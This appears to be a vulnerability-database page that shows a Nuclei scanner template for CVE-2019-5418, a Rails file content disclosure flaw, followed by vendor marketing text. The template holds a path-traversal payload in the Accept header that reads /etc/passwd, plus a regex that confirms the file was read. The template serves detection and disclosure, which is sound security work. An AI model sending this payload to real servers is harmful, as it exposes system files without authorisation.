Lucene search
K

Rails File Content Disclosure

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 67 Views

Rails File Content Disclosure vulnerability in Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3, allowing file content exposure via crafted accept headers leading to unauthorized access to sensitive information

Related
Refs
Code
id: CVE-2019-5418

info:
  name: Rails File Content Disclosure
  author: omarkurt
  severity: high
  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the patch provided by the Rails team or upgrade to a version that includes the fix.
  reference:
    - https://github.com/omarkurt/CVE-2019-5418
    - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
    - https://www.exploit-db.com/exploits/46585/
    - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-5418
    cwe-id: CWE-22,NVD-CWE-noinfo
    epss-score: 0.98507
    epss-percentile: 0.99913
    cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubyonrails
    product: rails
    shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails"
  tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      Accept: ../../../../../../../../etc/passwd{{

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
          - 500
# digest: 4a0a0047304502200e0f862301ba1858360344fbf95b28415525b494bbc2a646405fe304dfed519802210082276869854be888746b788c28ac11af0bb8e30fd89edcf3579b81c65254ad95:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.98507
SSVC
67